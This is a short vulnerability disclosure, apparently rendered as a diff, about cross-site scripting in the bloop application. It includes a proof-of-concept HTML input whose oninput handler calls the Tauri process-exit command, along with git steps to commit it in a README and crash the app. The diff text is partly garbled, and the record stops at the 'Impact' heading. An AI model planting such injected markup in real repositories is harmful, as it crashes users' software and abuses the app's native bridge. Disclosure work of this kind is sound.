Multiple Cross Site Scripting Vulnerabilities

 Proof of Concept to crash the application:

-• Place the below content into README.md
+mkdir -p test_repocd test_repogit init- Place the below content into

 <input id="path" oninput="window.__TAURI_INVOKE__(`tauri`,{__tauriModule:`Process`,message:{cmd:`exit`,exitCode: 1}}).then(console.log)" type="text"/>

-• git stage README.md && git commit -m "Initial Commit"
+git stage README.md && git commit -m "Initial Commit"- Sync this repository with

-• Inspect the repository inside bloop and observe the application crashing
+bloopand observe the application crashing

 Impact